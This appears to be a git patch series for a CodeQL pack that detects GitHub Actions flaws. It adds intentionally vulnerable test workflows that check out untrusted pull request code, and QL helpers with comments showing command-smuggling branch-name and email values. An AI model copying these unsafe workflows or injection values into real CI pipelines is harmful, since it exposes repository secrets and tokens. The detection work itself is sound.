@@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a non-privileged context ( inNonPrivilegedCompositeAction(checkout) or inNonPrivilegedJob(checkout) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml new file mode 100644 index 000000000000..afe1dfab038b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml @@ -0,0 +1,45 @@ +name: Check dist + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: # make sure the checked in dist/ folder matches the output of a rebuild + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Compare the expected and actual dist/ directories + run: script/check-diff + verify-index-js: # make sure the entrypoint js files run on a clean machine without compiling first + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: ./ + with: + milliseconds: 1000 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml new file mode 100644 index 000000000000..072eae4b1d2a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -0,0 +1,68 @@ +name: Compile dependabot updates + +on: + pull_request: + +permissions: + pull-requests: write + contents: write +jobs: + fetch-dependabot-metadata: + runs-on: ubuntu-latest + # We only want to check the metadata on pull_request events from Dependabot itself, + # any subsequent pushes to the PR should just skip this step so we don't go into + # a loop on commits created by the `build-dependabot-changes` job + if: ${{ github.actor == 'dependabot[bot]' }} + # Map the step output to a job output for subsequent jobs + outputs: + dependency-type: ${{ steps.dependabot-metadata.outputs.dependency-type }} + package-ecosystem: ${{ steps.dependabot-metadata.outputs.package-ecosystem }} + steps: + - name: Fetch dependabot metadata + id: dependabot-metadata + uses: dependabot/fetch-metadata@c9c4182bf1b97f5224aee3906fd373f6b61b4526 # v1.6.0 + with: + github-token: "${{ secrets.GITHUB_TOKEN }}" + build-dependabot-changes: + runs-on: ubuntu-latest + needs: [fetch-dependabot-metadata] + # We only need to build the dist/ folder if the PR relates to Docker or an npm dependency + if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' || needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'npm_and_yarn' + steps: + # Check out using a PAT so any pushed changes will trigger checkruns + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + token: ${{ secrets.DEPENDABOT_AUTOBUILD }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + # If we're reacting to a Docker PR, we have on extra step to refresh and check in the container manifest, + # this **must** happen before rebuilding dist/ so it uses the new version of the manifest + - name: Rebuild docker/containers.json + if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' + run: | + npm run update-container-manifest + git add docker/containers.json + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Check in any change to dist/ + run: | + git add dist/ + # Specifying the full email allows the avatar to show up: https://github.com/orgs/community/discussions/26560 + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + git commit -m "[dependabot skip] Update dist/ with build changes" || exit 0 + git push diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml new file mode 100644 index 000000000000..64e4992b5caf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: "Frogbot Scan Pull Request" +on: + pull_request_target: + types: [ opened, synchronize ] +permissions: + pull-requests: write + contents: read +jobs: + scan-pull-request: + runs-on: ubuntu-latest + environment: frogbot + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: jfrog/frogbot@8fbeca612957ae5f5f0c03a19cb6e59e237026f3 # v2.10.0 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + JF_GIT_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1f90c56607df..2660a726ab6f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -1,5 +1,7 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index a40ab1fa771b..9015e85b3d03 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -15,6 +15,7 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From c6e3bafe00b9068d3b3b0ff1318a99b3b6b44f08 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 24 May 2024 09:35:06 +0200 Subject: [PATCH 309/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 30aa95964e10..2736e30331c2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.29 +version: 0.0.30 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4c89d7804a90..451b49ec07e9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.29 +version: 0.0.30 groups: - actions - queries From 3e9c19044e58220399053ccb797f371c5de21c57 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 16:01:27 +0200 Subject: [PATCH 310/707] Improve bash and source regexpps --- ql/lib/codeql/actions/Helper.qll | 284 +++++++++------ ql/lib/codeql/actions/ast/internal/Ast.qll | 21 +- .../codeql/actions/dataflow/FlowSources.qll | 344 ++++++++---------- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 52 +-- .../security/EnvPathInjectionQuery.qll | 8 +- .../actions/security/EnvVarInjectionQuery.qll | 14 +- .../actions/security/PoisonableSteps.qll | 13 +- .../.github/workflows/multiline.yml | 56 +++ ql/test/library-tests/test.expected | 319 +++++++++++++--- ql/test/library-tests/test.ql | 86 ++++- .../.github/workflows/reusable_workflow.yml | 2 +- .../CWE-077/.github/workflows/test4.yml | 15 +- .../CWE-077/EnvVarInjectionCritical.expected | 16 +- .../CWE-077/EnvVarInjectionMedium.expected | 11 +- .../CWE-094/.github/workflows/test5.yml | 13 + .../CWE-094/CodeInjectionCritical.expected | 2 + .../CWE-094/CodeInjectionMedium.expected | 1 + 17 files changed, 820 insertions(+), 437 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 416cb97c8d08..563a9800214e 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -10,12 +10,11 @@ string normalizeExpr(string expr) { } bindingset[regex] -string wrapRegexp(string regex) { - result = - [ - "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", - "toJSON\\(\\s*" + regex + "\\s*\\)" - ] +string wrapRegexp(string regex) { result = "\\b" + regex + "\\b" } + +bindingset[regex] +string wrapJsonRegexp(string regex) { + result = ["fromJSON\\(\\s*" + regex + "\\s*\\)", "toJSON\\(\\s*" + regex + "\\s*\\)"] } bindingset[str] @@ -23,135 +22,190 @@ private string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } -bindingset[line, var] -predicate extractLineAssignment(string line, string var, string key, string value) { - exists(string assignment | - // single line assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + - var.toUpperCase() + "(\\})?(\"|')?", 2) and - count(assignment.splitAt("=")) = 2 and - key = trimQuotes(assignment.splitAt("=", 0)) and - value = trimQuotes(assignment.splitAt("=", 1)) +/** Checks if expr is a bash parameter expansion */ +bindingset[expr] +predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" or - // workflow command assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + - "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and - key = trimQuotes(assignment.splitAt("::", 0)) and - value = trimQuotes(assignment.splitAt("::", 1)) + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) ) } -bindingset[var] -private string multilineAssignmentRegex(string var) { - // eg: - // echo "PR_TITLE<> $GITHUB_ENV - // echo "$TITLE" >> $GITHUB_ENV - // echo "EOF" >> $GITHUB_ENV - result = - ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" -} - -bindingset[var] -private string multilineBlockAssignmentRegex(string var) { - // eg: - // { - // echo 'JSON_RESPONSE<> "$GITHUB_ENV" - // echo EOF - // } >> "$GITHUB_ENV" - result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" +// TODO, the followinr test fails +bindingset[raw_content] +predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) } -bindingset[var] -private string multilineHereDocAssignmentRegex(string var) { - // eg: - // cat <<-EOF >> "$GITHUB_ENV" - // echo "FOO=$TITLE" - // EOF - result = - ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + - "[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" +bindingset[script] +predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = "(?i)(echo|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) } -bindingset[script, var] -predicate extractMultilineAssignment(string script, string var, string key, string value) { - // multiline assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) +bindingset[script] +predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) ) - or - // multiline block assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) +} + +bindingset[script] +predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = "(?msi).*^(cat)\\s*(>>|>)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 3)) and + content = script.regexpCapture(regexp, 5) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 6)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 7) ) - or - // multiline heredoc assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") and - key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) +} + +bindingset[script] +predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*(echo\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "(echo\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + content = + trimQuotes(script.regexpCapture(regexp, 2)) + "\n" + "$(" + + trimQuotes(script.regexpCapture(regexp, 5)) + + // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content + //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") + ")\n" + trimQuotes(script.regexpCapture(regexp, 3)) and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + filters = "" ) } -bindingset[line] -predicate extractPathAssignment(string line, string value) { - exists(string path | - // single path assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", - 2) and - value = trimQuotes(path) - or - // workflow command assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") and - value = trimQuotes(path) +bindingset[script] +predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>)\\s*(\\S+))\\s*$.*" and + content = + script + .regexpCapture(regexp, 1) + .regexpReplaceAll("(?m)^[ ]*echo\\s*['\"](.*?)['\"]", "$1") + .regexpReplaceAll("(?m)^[ ]*echo\\s*", "") and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + cmd = "echo" and + filters = "" + ) +} + +bindingset[script] +predicate multiLineFileWrite(string script, string cmd, string file, string content, string filters) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) +} + +bindingset[script, file_var] +predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isBashParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isBashParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) ) } -predicate writeToGitHubEnv(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or - extractMultilineAssignment(run.getScript(), "ENV", key, value) +predicate writeToGitHubEnv(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_ENV", content) } -predicate writeToGitHubOutput(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or - extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) +predicate writeToGitHubOutput(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_OUTPUT", content) } -predicate writeToGitHubPath(Run run, string value) { - extractPathAssignment(run.getScript().splitAt("\n"), value) +predicate writeToGitHubPath(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_PATH", content) } predicate inPrivilegedCompositeAction(AstNode node) { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 61f0fa8e36e9..1094a152126b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -749,12 +749,19 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the job can be triggered by an external actor. */ predicate isExternallyTriggerable() { // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) or + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + or // the job is triggered by a workflow_call event that can be triggered externally this.getATriggerEvent().getName() = "workflow_call" and - (exists(ExpressionImpl e, string external_trigger | e.getEnclosingJob() = this and e.getExpression().matches("%github.event" + external_trigger + "%") and externallyTriggerableEventsDataModel(external_trigger)) - or - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable()) + ( + exists(ExpressionImpl e, string external_trigger | + e.getEnclosingJob() = this and + e.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable() + ) } /** Holds if the job is privileged. */ @@ -781,9 +788,9 @@ class JobImpl extends AstNodeImpl, TJobNode { private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | - (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and + (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and - not expr.getFieldName() = "GITHUB_TOKEN" + not expr.getFieldName() = "GITHUB_TOKEN" ) } @@ -814,7 +821,7 @@ class JobImpl extends AstNodeImpl, TJobNode { // the Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and not this.getATriggerEvent().getName() = "pull_request" and - not this.getATriggerEvent().getName() = "workflow_call" + not this.getATriggerEvent().getName() = "workflow_call" or // the Workflow is a Reusable Workflow only and there is // a privileged caller workflow or we cant find a caller diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ca3e21e9d255..5f2d36e7cd80 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,186 +19,140 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -bindingset[context] -private predicate titleEvent(string context) { - exists(string reg | - reg = - [ - // title - "github\\.event\\.issue\\.title", // issue - "github\\.event\\.pull_request\\.title", // pull request - "github\\.event\\.discussion\\.title", // discussion - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title", - "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string titleEvent() { + result = + [ + "github\\.event\\.issue\\.title", // issue + "github\\.event\\.pull_request\\.title", // pull request + "github\\.event\\.discussion\\.title", // discussion + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title", "github\\.event\\.workflow_run\\.display_title", + ] } -bindingset[context] -private predicate urlEvent(string context) { - exists(string reg | - reg = - [ - // url - "github\\.event\\.pull_request\\.head\\.repo\\.homepage", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string urlEvent() { result = "github\\.event\\.pull_request\\.head\\.repo\\.homepage" } + +private string textEvent() { + result = + [ + "github\\.event\\.issue\\.body", // body + "github\\.event\\.pull_request\\.body", // body + "github\\.event\\.discussion\\.body", // body + "github\\.event\\.review\\.body", // body + "github\\.event\\.comment\\.body", // body + "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage + "github\\.event\\.head_commit\\.message", // message + "github\\.event\\.workflow_run\\.head_commit\\.message", // message + "github\\.event\\.pull_request\\.head\\.repo\\.description", // description + "github\\.event\\.workflow_run\\.head_repository\\.description", // description + "github\\.event\\.client_payload\\[[0-9]+\\]", // payload + "github\\.event\\.client_payload", // payload + ] } -bindingset[context] -private predicate textEvent(string context) { - exists(string reg | - reg = - [ - // text - "github\\.event\\.issue\\.body", // body - "github\\.event\\.pull_request\\.body", // body - "github\\.event\\.discussion\\.body", // body - "github\\.event\\.review\\.body", // body - "github\\.event\\.comment\\.body", // body - "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage - "github\\.event\\.head_commit\\.message", // message - "github\\.event\\.workflow_run\\.head_commit\\.message", // message - "github\\.event\\.pull_request\\.head\\.repo\\.description", // description - "github\\.event\\.workflow_run\\.head_repository\\.description", // description - "github\\.event\\.client_payload\\[[0-9]+\\]", // payload - "github\\.event\\.client_payload", // payload - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string branchEvent() { + // branch + // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names + // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. + // - They must contain at least one / + // - They cannot have two consecutive dots .. anywhere. + // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. + // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. + // - They cannot begin or end with a slash / or contain multiple consecutive slashes + // - They cannot end with a dot . + // - They cannot contain a sequence @{ + // - They cannot be the single character @ + // - They cannot contain a \ + // eg: zzz";echo${IFS}"hello";# would be a valid branch name + result = + [ + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.merge_group\\.head_ref", + ] } -bindingset[context] -private predicate branchEvent(string context) { - exists(string reg | - reg = - [ - // branch - // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names - // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. - // - They must contain at least one / - // - They cannot have two consecutive dots .. anywhere. - // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. - // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. - // - They cannot begin or end with a slash / or contain multiple consecutive slashes - // - They cannot end with a dot . - // - They cannot contain a sequence @{ - // - They cannot be the single character @ - // - They cannot contain a \ - // eg: zzz";echo${IFS}"hello";# would be a valid branch name - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.merge_group\\.head_ref", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string labelEvent() { + // - They cannot contain a escaping \ + result = ["github\\.event\\.pull_request\\.head\\.label",] } -bindingset[context] -private predicate labelEvent(string context) { - exists(string reg | - reg = - [ - // label - // - They cannot contain a escaping \ - "github\\.event\\.pull_request\\.head\\.label", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string emailEvent() { + // `echo${IFS}hello`@domain.com + result = + [ + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.merge_group\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + ] } -bindingset[context] -private 